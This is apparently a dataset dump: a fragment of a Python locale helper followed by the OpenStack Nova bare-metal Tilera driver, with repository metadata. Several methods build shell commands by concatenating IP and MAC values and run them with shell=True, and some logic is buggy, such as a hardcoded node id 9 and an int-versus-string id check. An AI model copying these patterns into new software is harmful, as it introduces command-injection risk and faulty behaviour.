locale_n = str((locale.normalize(lang).split('.')[0]))
if not is_valid_locale(locale_n):
locale_n = None
return locale_n
def workaround_empty_LC_ALL_posix():
# clunky hack: we have seen some posix locales with all or most of LC_*
# defined to the same value, but with LC_ALL empty.
# Manually doing what we do here seems to work for nikola in that case.
# It is unknown if it will work when the LC_* aren't homogeneous
try:
lc_time = os.environ.get('LC_TIME', None)
lc_all = os.environ.get('LC_ALL', None)
if lc_time and not lc_all:
os.environ['LC_ALL'] = lc_time
except Exception:
pass
| mit | 7,813,781,816,376,014,000 | 43.03318 | 196 | 0.547451 | false |
psiwczak/openstack | nova/virt/baremetal/tilera.py | 1 | 12639 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 University of Southern California
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tilera back-end for bare-metal compute node provisioning
The details of this implementation are specific to ISI's testbed. This code
is provided here as an example of how to implement a backend.
"""
import base64
import os
import subprocess
import time
from nova.compute import power_state
from nova.openstack.common import cfg
from nova import exception
from nova import flags
from nova import log as logging
from nova import utils
FLAGS = flags.FLAGS
tilera_opts = [
cfg.StrOpt('tile_monitor',
default='/usr/local/TileraMDE/bin/tile-monitor',
help='Tilera command line program for Bare-metal driver')
]
FLAGS.register_opts(tilera_opts)
LOG = logging.getLogger(__name__)
def get_baremetal_nodes():
return BareMetalNodes()
class BareMetalNodes(object):
"""
This manages node information and implements singleton.
BareMetalNodes class handles machine architectures of interest to
technical computing users have either poor or non-existent support
for virtualization.
"""
_instance = None
_is_init = False
def __new__(cls, *args, **kwargs):
"""
Returns the BareMetalNodes singleton.
"""
if not cls._instance or ('new' in kwargs and kwargs['new']):
cls._instance = super(BareMetalNodes, cls).__new__(cls)
return cls._instance
def __init__(self, file_name="/tftpboot/tilera_boards"):
"""
Only call __init__ the first time object is instantiated.
From the bare-metal node list file: /tftpboot/tilera_boards,
reads each item of each node such as node ID, IP address,
MAC address, vcpus, memory, hdd, hypervisor type/version, and cpu
and appends each node information into nodes list.
"""
if self._is_init:
return
self._is_init = True
self.nodes = []
self.BOARD_ID = 0
self.IP_ADDR = 1
self.MAC_ADDR = 2
self.VCPUS = 3
self.MEMORY_MB = 4
self.LOCAL_GB = 5
self.MEMORY_MB_USED = 6
self.LOCAL_GB_USED = 7
self.HYPERVISOR_TYPE = 8
self.HYPERVISOR_VER = 9
self.CPU_INFO = 10
fp = open(file_name, "r")
for item in fp:
l = item.split()
if l[0] == '#':
continue
l_d = {'node_id': int(l[self.BOARD_ID]),
'ip_addr': l[self.IP_ADDR],
'mac_addr': l[self.MAC_ADDR],
'status': power_state.NOSTATE,
'vcpus': int(l[self.VCPUS]),
'memory_mb': int(l[self.MEMORY_MB]),
'local_gb': int(l[self.LOCAL_GB]),
'memory_mb_used': int(l[self.MEMORY_MB_USED]),
'local_gb_used': int(l[self.LOCAL_GB_USED]),
'hypervisor_type': l[self.HYPERVISOR_TYPE],
'hypervisor_version': int(l[self.HYPERVISOR_VER]),
'cpu_info': l[self.CPU_INFO]}
self.nodes.append(l_d)
fp.close()
def get_hw_info(self, field):
"""
Returns hardware information of bare-metal node by the given field.
Given field can be vcpus, memory_mb, local_gb, memory_mb_used,
local_gb_used, hypervisor_type, hypervisor_version, and cpu_info.
"""
for node in self.nodes:
if node['node_id'] == 9:
if field == 'vcpus':
return node['vcpus']
elif field == 'memory_mb':
return node['memory_mb']
elif field == 'local_gb':
return node['local_gb']
elif field == 'memory_mb_used':
return node['memory_mb_used']
elif field == 'local_gb_used':
return node['local_gb_used']
elif field == 'hypervisor_type':
return node['hypervisor_type']
elif field == 'hypervisor_version':
return node['hypervisor_version']
elif field == 'cpu_info':
return node['cpu_info']
def set_status(self, node_id, status):
"""
Sets status of the given node by the given status.
Returns 1 if the node is in the nodes list.
"""
for node in self.nodes:
if node['node_id'] == node_id:
node['status'] = status
return True
return False
def get_status(self):
"""
Gets status of the given node.
"""
pass
def get_idle_node(self):
"""
Gets an idle node, sets the status as 1 (RUNNING) and Returns node ID.
"""
for item in self.nodes:
if item['status'] == 0:
item['status'] = 1 # make status RUNNING
return item['node_id']
raise exception.NotFound("No free nodes available")
def get_ip_by_id(self, id):
"""
Returns default IP address of the given node.
"""
for item in self.nodes:
if item['node_id'] == id:
return item['ip_addr']
def free_node(self, node_id):
"""
Sets/frees status of the given node as 0 (IDLE).
"""
LOG.debug(_("free_node...."))
for item in self.nodes:
if item['node_id'] == str(node_id):
item['status'] = 0 # make status IDLE
def power_mgr(self, node_id, mode):
"""
Changes power state of the given node.
According to the mode (1-ON, 2-OFF, 3-REBOOT), power state can be
changed. /tftpboot/pdu_mgr script handles power management of
PDU (Power Distribution Unit).
"""
if node_id < 5:
pdu_num = 1
pdu_outlet_num = node_id + 5
else:
pdu_num = 2
pdu_outlet_num = node_id
path1 = "10.0.100." + str(pdu_num)
utils.execute('/tftpboot/pdu_mgr', path1, str(pdu_outlet_num),
str(mode), '>>', 'pdu_output')
def deactivate_node(self, node_id):
"""
Deactivates the given node by turnning it off.
/tftpboot/fs_x directory is a NFS of node#x
and /tftpboot/root_x file is an file system image of node#x.
"""
node_ip = self.get_ip_by_id(node_id)
LOG.debug(_("deactivate_node is called for "
"node_id = %(id)s node_ip = %(ip)s"),
{'id': str(node_id), 'ip': node_ip})
for item in self.nodes:
if item['node_id'] == node_id:
LOG.debug(_("status of node is set to 0"))
item['status'] = 0
self.power_mgr(node_id, 2)
self.sleep_mgr(5)
path = "/tftpboot/fs_" + str(node_id)
pathx = "/tftpboot/root_" + str(node_id)
utils.execute('sudo', '/usr/sbin/rpc.mountd')
try:
utils.execute('sudo', 'umount', '-f', pathx)
utils.execute('sudo', 'rm', '-f', pathx)
except Exception:
LOG.debug(_("rootfs is already removed"))
def network_set(self, node_ip, mac_address, ip_address):
"""
Sets network configuration based on the given ip and mac address.
User can access the bare-metal node using ssh.
"""
cmd = (FLAGS.tile_monitor +
" --resume --net " + node_ip + " --run - " +
"ifconfig xgbe0 hw ether " + mac_address +
" - --wait --run - ifconfig xgbe0 " + ip_address +
" - --wait --quit")
subprocess.Popen(cmd, shell=True)
#utils.execute(cmd, shell=True)
self.sleep_mgr(5)
def iptables_set(self, node_ip, user_data):
"""
Sets security setting (iptables:port) if needed.
iptables -A INPUT -p tcp ! -s $IP --dport $PORT -j DROP
/tftpboot/iptables_rule script sets iptables rule on the given node.
"""
if user_data != '':
open_ip = base64.b64decode(user_data)
utils.execute('/tftpboot/iptables_rule', node_ip, open_ip)
def check_activated(self, node_id, node_ip):
"""
Checks whether the given node is activated or not.
"""
LOG.debug(_("Before ping to the bare-metal node"))
tile_output = "/tftpboot/tile_output_" + str(node_id)
grep_cmd = ("ping -c1 " + node_ip + " | grep Unreachable > " +
tile_output)
subprocess.Popen(grep_cmd, shell=True)
self.sleep_mgr(5)
file = open(tile_output, "r")
out_msg = file.readline().find("Unreachable")
utils.execute('sudo', 'rm', tile_output)
if out_msg == -1:
LOG.debug(_("TILERA_BOARD_#%(node_id)s %(node_ip)s is ready"),
locals())
return True
else:
LOG.debug(_("TILERA_BOARD_#%(node_id)s %(node_ip)s is not ready,"
" out_msg=%(out_msg)s"), locals())
self.power_mgr(node_id, 2)
return False
def vmlinux_set(self, node_id, mode):
"""
Sets kernel into default path (/tftpboot) if needed.
From basepath to /tftpboot, kernel is set based on the given mode
such as 0-NoSet, 1-SetVmlinux, or 9-RemoveVmlinux.
"""
LOG.debug(_("Noting to do for tilera nodes: vmlinux is in CF"))
def sleep_mgr(self, time_in_seconds):
"""
Sleeps until the node is activated.
"""
time.sleep(time_in_seconds)
def ssh_set(self, node_ip):
"""
Sets and Runs sshd in the node.
"""
cmd = (FLAGS.tile_monitor +
" --resume --net " + node_ip + " --run - " +
"/usr/sbin/sshd - --wait --quit")
subprocess.Popen(cmd, shell=True)
self.sleep_mgr(5)
def activate_node(self, node_id, node_ip, name, mac_address,
ip_address, user_data):
"""
Activates the given node using ID, IP, and MAC address.
"""
LOG.debug(_("activate_node"))
self.power_mgr(node_id, 2)
self.power_mgr(node_id, 3)
self.sleep_mgr(100)
try:
self.check_activated(node_id, node_ip)
self.network_set(node_ip, mac_address, ip_address)
self.ssh_set(node_ip)
self.iptables_set(node_ip, user_data)
return power_state.RUNNING
except Exception as ex:
self.deactivate_node(node_id)
raise exception.NovaException(_("Node is unknown error state."))
def get_console_output(self, console_log, node_id):
"""
Gets console output of the given node.
"""
node_ip = self.get_ip_by_id(node_id)
log_path = "/tftpboot/log_" + str(node_id)
kmsg_cmd = (FLAGS.tile_monitor +
" --resume --net " + node_ip +
" -- dmesg > " + log_path)
subprocess.Popen(kmsg_cmd, shell=True)
self.sleep_mgr(5)
utils.execute('cp', log_path, console_log)
def get_image(self, bp):
"""
Gets the bare-metal file system image into the instance path.
Noting to do for tilera nodes: actual image is used.
"""
path_fs = "/tftpboot/tilera_fs"
path_root = bp + "/root"
utils.execute('cp', path_fs, path_root)
def set_image(self, bpath, node_id):
"""
Sets the PXE bare-metal file system from the instance path.
This should be done after ssh key is injected.
/tftpboot/fs_x directory is a NFS of node#x.
/tftpboot/root_x file is an file system image of node#x.
"""
path1 = bpath + "/root"
pathx = "/tftpboot/root_" + str(node_id)
path2 = "/tftpboot/fs_" + str(node_id)
utils.execute('sudo', 'mv', path1, pathx)
utils.execute('sudo', 'mount', '-o', 'loop', pathx, path2)
| apache-2.0 | 6,158,067,869,919,608,000 | 33.627397 | 78 | 0.544505 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.